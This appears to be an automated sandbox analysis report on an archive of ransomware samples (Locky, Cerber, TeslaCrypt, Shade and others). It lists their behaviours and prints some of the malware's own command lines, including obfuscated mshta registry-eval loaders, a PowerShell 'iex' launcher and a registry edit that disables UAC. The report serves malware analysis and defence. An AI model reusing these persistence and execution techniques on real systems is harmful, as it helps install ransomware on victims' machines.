Analysis Overview
SHA256
20b37ae125dc868f05fe28dad7206435d99baaf499f10ffa361bb071eeba1c02
Threat Level: Known bad
The file RNSM00272.7z was found to be: Known bad.
Malicious Activity Summary
Troldesh family
Teslacrypt family
UAC bypass
Troldesh, Shade, Encoder.858
Modiloader family
Cerber family
Locky family
ModiLoader, DBatLoader
TeslaCrypt, AlphaCrypt
Process spawned unexpected child process
Locky
Cerber
Checks for common network interception software
ModiLoader Second Stage
Looks for VirtualBox Guest Additions in registry
Looks for VirtualBox drivers on disk
Deletes shadow copies
Renames multiple (387) files with added filename extension
Adds policy Run key to start application
Contacts a large (755) amount of remote hosts
Looks for VMWare Tools registry key
Checks BIOS information in registry
Executes dropped EXE
Reads user/profile data of web browsers
Reads local data of messenger clients
Drops startup file
Uses the VBS compiler for execution
Loads dropped DLL
Checks whether UAC is enabled
Indicator Removal: File Deletion
Checks for any installed AV software in registry
Maps connected drives based on registry
Accesses Microsoft Outlook accounts
Adds Run key to start application
Command and Scripting Interpreter: PowerShell
Suspicious use of SetThreadContext
UPX packed file
Sets desktop wallpaper using registry
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
NSIS installer
Suspicious behavior: GetForegroundWindowSpam
System policy modification
Suspicious use of SetWindowsHookEx
Suspicious behavior: RenamesItself
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Kills process with taskkill
Modifies Internet Explorer settings
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious behavior: EnumeratesProcesses
Runs ping.exe
Modifies system certificate store
Suspicious use of AdjustPrivilegeToken
Opens file in notepad (likely ransom note)
Modifies Control Panel
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-22 21:58
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-22 21:58
Reported
2024-11-22 22:02
Platform
win7-20240903-en
Max time kernel
208s
Max time network
209s
Command Line
Signatures
Cerber
Cerber family
Locky
Locky family
ModiLoader, DBatLoader
Modiloader family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\mshta.exe |
TeslaCrypt, AlphaCrypt
Teslacrypt family
Troldesh family
Troldesh, Shade, Encoder.858
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe | N/A |
Checks for common network interception software
Deletes shadow copies
Looks for VirtualBox Guest Additions in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Looks for VirtualBox drivers on disk
| Description | Indicator | Process | Target |
| File opened (read-only) | C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys | C:\Windows\SysWOW64\regsvr32.exe | N/A |
ModiLoader Second Stage
Renames multiple (387) files with added filename extension
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:ZcCO3eYX3I=\"z\";yr65=new%20ActiveXObject(\"WScript.Shell\");xJ1uTTFD=\"rkT2TkEcx\";NnP7r1=yr65.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\397d13d44c\\\\dc778891\");wZd7mOs1Qg=\"sYbwa2qRbT\";eval(NnP7r1);tAMXMYIv40=\"vJm8fuzfG8\";" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Contacts a large (755) amount of remote hosts
Looks for VMWare Tools registry key
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Recovery+kxssw.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Recovery+kxssw.txt | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Recovery+kxssw.html | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Recovery+kxssw.png | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Recovery+kxssw.txt | C:\Windows\mbhvrmroopgk.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Recovery+kxssw.html | C:\Windows\mbhvrmroopgk.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads local data of messenger clients
Reads user/profile data of web browsers
Uses the VBS compiler for execution
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\B9oBmLC = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\Windows\\szyokvv.exe" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:CMhiIzj2=\"N2gPNFlND\";wg2=new%20ActiveXObject(\"WScript.Shell\");kqu4TuV=\"fQ\";laX5p=wg2.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\397d13d44c\\\\dc778891\");KPV13lZL=\"WM0m2athgE\";eval(laX5p);vjXphTMe7=\"8BfnMYUcP3\";" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:sL1Pukn=\"8YFE\";d1y0=new%20ActiveXObject(\"WScript.Shell\");Ga0wQCbao9=\"UKwFtny\";Oz3Ne3=d1y0.RegRead(\"HKCU\\\\software\\\\397d13d44c\\\\dc778891\");qqE3DZpr5j=\"E6tIV\";eval(Oz3Ne3);eGS3JqZi=\"19J086X\";" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Updatedlogs = "C:\\Users\\Admin\\AppData\\Roaming\\Updatedlogs\\Updatedlogs.exe" | C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Updatedlogs = "C:\\Users\\Admin\\AppData\\Roaming\\Updatedlogs\\Updatedlogs.exe" | C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\gdegrfrrpghc = "C:\\Windows\\system32\\cmd.exe /c start \"\" \"C:\\Windows\\mbhvrmroopgk.exe\"" | C:\Windows\mbhvrmroopgk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" | C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Shade.lfk-2d9f35116b5be4c23bf217eb04cf533f05caefbe4b2bf4c58638659e6a440326.exe | N/A |
Checks for any installed AV software in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Avira\AntiVir PersonalEdition Classic | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Avira\AntiVir PersonalEdition Classic | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Indicator Removal: File Deletion
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpF4CA.bmp" | C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Zerber.fctg-380fd1bd4fbbacd3cd0146954622cc8380077639ed7930809fa5489763da54ed.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\-INSTRUCTION.bmp" | C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Scatter.kj-8da94dbae85508bec272d12ca4a80a3607a24bf63d3217a31b29b10adecdc592.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
Drops file in Program Files directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\mbhvrmroopgk.exe | C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Bitman.kmx-c2cf183728169e52ff321e73ab1ace52208a03781942d3323281b89ef29e681e.exe | N/A |
| File opened for modification | C:\Windows\mbhvrmroopgk.exe | C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Bitman.kmx-c2cf183728169e52ff321e73ab1ace52208a03781942d3323281b89ef29e681e.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
NSIS installer
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\PowerCfg | C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Foreign.niji-e37766201ae534aa196d0afd8e9131f7f2b029aef9cbc5110c7666894c8dd6c6.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\Desktop\WallpaperStyle = "0" | C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Scatter.kj-8da94dbae85508bec272d12ca4a80a3607a24bf63d3217a31b29b10adecdc592.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Scatter.kj-8da94dbae85508bec272d12ca4a80a3607a24bf63d3217a31b29b10adecdc592.exe | N/A |
Modifies Internet Explorer settings
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Windows\mbhvrmroopgk.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob | C:\Windows\mbhvrmroopgk.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: MapViewOfSection
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\mbhvrmroopgk.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Shade.vr-f9cc48c63abafdadfc229a0ac94edffdf983f635dd6ce1a58121a2e881f7fe9c.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Windows\mbhvrmroopgk.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Windows\mbhvrmroopgk.exe | N/A |
Processes
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00272.7z"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.MSIL.Foreign.gen-d3585f6d8260f3af04debbcd9ef854d6763c5ec42c42610a6fb219f0c33f325d.exe
HEUR-Trojan-Ransom.MSIL.Foreign.gen-d3585f6d8260f3af04debbcd9ef854d6763c5ec42c42610a6fb219f0c33f325d.exe
C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.NSIS.Shade.gen-d1f89325958075f2c5844522563cbc91019828b9e29758de4e2b621548d4cb65.exe
HEUR-Trojan-Ransom.NSIS.Shade.gen-d1f89325958075f2c5844522563cbc91019828b9e29758de4e2b621548d4cb65.exe
C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.Win32.Agent.gen-06bcdd333935c1f1c251ee836533f2330030eaf5d37444a6dd86732cf9370b5b.exe
HEUR-Trojan-Ransom.Win32.Agent.gen-06bcdd333935c1f1c251ee836533f2330030eaf5d37444a6dd86732cf9370b5b.exe
C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.Win32.Agent.gen-fb9b7b8c11c10bbe837d5618118276d2c9a926ef85ed144a48fd1551efbfb37e.exe
HEUR-Trojan-Ransom.Win32.Agent.gen-fb9b7b8c11c10bbe837d5618118276d2c9a926ef85ed144a48fd1551efbfb37e.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.NSIS.Onion.afxv-195d8b2ecfbb6c0b6d2c3f6eff068eb99089bb75655760d8302e1517357f2400.exe
Trojan-Ransom.NSIS.Onion.afxv-195d8b2ecfbb6c0b6d2c3f6eff068eb99089bb75655760d8302e1517357f2400.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Bitman.kmx-c2cf183728169e52ff321e73ab1ace52208a03781942d3323281b89ef29e681e.exe
Trojan-Ransom.Win32.Bitman.kmx-c2cf183728169e52ff321e73ab1ace52208a03781942d3323281b89ef29e681e.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Foreign.niji-e37766201ae534aa196d0afd8e9131f7f2b029aef9cbc5110c7666894c8dd6c6.exe
Trojan-Ransom.Win32.Foreign.niji-e37766201ae534aa196d0afd8e9131f7f2b029aef9cbc5110c7666894c8dd6c6.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Gen.nw-b8949ae0d1a481af1cae9df5e01d508d1319b6d47fb329e9b42627e4e2a72a3d.exe
Trojan-Ransom.Win32.Gen.nw-b8949ae0d1a481af1cae9df5e01d508d1319b6d47fb329e9b42627e4e2a72a3d.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Locky.bil-a310a444b8be17dec94e41f1710ebebf6eb84e18fb7f47d795796b7af4f24442.exe
Trojan-Ransom.Win32.Locky.bil-a310a444b8be17dec94e41f1710ebebf6eb84e18fb7f47d795796b7af4f24442.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Locky.d-78e9558a9762cf778a3ba9ba61e0ec73e8d81c22d0945e56ea75d197c512883a.exe
Trojan-Ransom.Win32.Locky.d-78e9558a9762cf778a3ba9ba61e0ec73e8d81c22d0945e56ea75d197c512883a.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Scatter.jt-100b8bfff550fb74c98a2ef9a71d4bb53553d2d7ba509bb451fe32814ec57e48.exe
Trojan-Ransom.Win32.Scatter.jt-100b8bfff550fb74c98a2ef9a71d4bb53553d2d7ba509bb451fe32814ec57e48.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Scatter.kj-8da94dbae85508bec272d12ca4a80a3607a24bf63d3217a31b29b10adecdc592.exe
Trojan-Ransom.Win32.Scatter.kj-8da94dbae85508bec272d12ca4a80a3607a24bf63d3217a31b29b10adecdc592.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Shade.lfk-2d9f35116b5be4c23bf217eb04cf533f05caefbe4b2bf4c58638659e6a440326.exe
Trojan-Ransom.Win32.Shade.lfk-2d9f35116b5be4c23bf217eb04cf533f05caefbe4b2bf4c58638659e6a440326.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Shade.vr-f9cc48c63abafdadfc229a0ac94edffdf983f635dd6ce1a58121a2e881f7fe9c.exe
Trojan-Ransom.Win32.Shade.vr-f9cc48c63abafdadfc229a0ac94edffdf983f635dd6ce1a58121a2e881f7fe9c.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Zerber.fctg-380fd1bd4fbbacd3cd0146954622cc8380077639ed7930809fa5489763da54ed.exe
Trojan-Ransom.Win32.Zerber.fctg-380fd1bd4fbbacd3cd0146954622cc8380077639ed7930809fa5489763da54ed.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Shade.lfk-2d9f35116b5be4c23bf217eb04cf533f05caefbe4b2bf4c58638659e6a440326.exe
Trojan-Ransom.Win32.Shade.lfk-2d9f35116b5be4c23bf217eb04cf533f05caefbe4b2bf4c58638659e6a440326.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Zerber.fctg-380fd1bd4fbbacd3cd0146954622cc8380077639ed7930809fa5489763da54ed.exe
Trojan-Ransom.Win32.Zerber.fctg-380fd1bd4fbbacd3cd0146954622cc8380077639ed7930809fa5489763da54ed.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Scatter.kj-8da94dbae85508bec272d12ca4a80a3607a24bf63d3217a31b29b10adecdc592.exe
Trojan-Ransom.Win32.Scatter.kj-8da94dbae85508bec272d12ca4a80a3607a24bf63d3217a31b29b10adecdc592.exe
C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.Win32.Agent.gen-06bcdd333935c1f1c251ee836533f2330030eaf5d37444a6dd86732cf9370b5b.exe
HEUR-Trojan-Ransom.Win32.Agent.gen-06bcdd333935c1f1c251ee836533f2330030eaf5d37444a6dd86732cf9370b5b.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C del /Q /F "C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.Win32.Agent.gen-06bcdd333935c1f1c251ee836533f2330030eaf5d37444a6dd86732cf9370b5b.exe"
C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.Win32.Agent.gen-fb9b7b8c11c10bbe837d5618118276d2c9a926ef85ed144a48fd1551efbfb37e.exe
HEUR-Trojan-Ransom.Win32.Agent.gen-fb9b7b8c11c10bbe837d5618118276d2c9a926ef85ed144a48fd1551efbfb37e.exe
C:\Windows\syswow64\svchost.exe
C:\Windows\syswow64\svchost.exe
C:\Windows\SysWOW64\svchost.exe
"C:\Windows\system32\svchost.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sys82F5.tmp"
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Shade.vr-f9cc48c63abafdadfc229a0ac94edffdf983f635dd6ce1a58121a2e881f7fe9c.exe
"C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Shade.vr-f9cc48c63abafdadfc229a0ac94edffdf983f635dd6ce1a58121a2e881f7fe9c.exe"
C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" javascript:NnxrCN3="tZljD6W5";K8I=new%20ActiveXObject("WScript.Shell");tQbeT9OL9="hC";RV7Yx=K8I.RegRead("HKLM\\software\\Wow6432Node\\Vc8Othhops\\EPo8cL");c7aBwef="gFCwXQG";eval(RV7Yx);Zru3zfXLT="c1cl6oB8cJ";
C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.NSIS.Shade.gen-d1f89325958075f2c5844522563cbc91019828b9e29758de4e2b621548d4cb65.exe
HEUR-Trojan-Ransom.NSIS.Shade.gen-d1f89325958075f2c5844522563cbc91019828b9e29758de4e2b621548d4cb65.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:cjhvut
C:\Users\Admin\AppData\Local\Temp\nso601B.tmp\2266-DailyOffers-1949-1.0.0.1045.exe
"C:\Users\Admin\AppData\Local\Temp\nso601B.tmp\2266-DailyOffers-1949-1.0.0.1045.exe" /S
C:\Users\Admin\AppData\Local\Temp\nse8BBE.tmp\mf.exe
C:\Users\Admin\AppData\Local\Temp\nse8BBE.tmp\mf.exe "C:\Users\Admin\AppData\Local\Temp\nse8BBE.tmp\inetc.dll"
C:\Users\Admin\AppData\Local\Temp\nse8BBE.tmp\ef.exe
C:\Users\Admin\AppData\Local\Temp\nse8BBE.tmp\ef.exe "C:\Users\Admin\AppData\Local\Temp\nse8BBE.tmp\inetc.dll" -1949
C:\Users\Admin\AppData\Local\Temp\svchost.exe
C:\Users\Admin\AppData\Local\Temp\svchost.exe
C:\Windows\system32\cmd.exe
cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sysD8E2.tmp"
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Bitman.kmx-c2cf183728169e52ff321e73ab1ace52208a03781942d3323281b89ef29e681e.exe
Trojan-Ransom.Win32.Bitman.kmx-c2cf183728169e52ff321e73ab1ace52208a03781942d3323281b89ef29e681e.exe
C:\Windows\mbhvrmroopgk.exe
C:\Windows\mbhvrmroopgk.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00272\TROJAN~2.EXE
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x55c
C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe
"C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe"
C:\Windows\SysWOW64\regsvr32.exe
regsvr32.exe
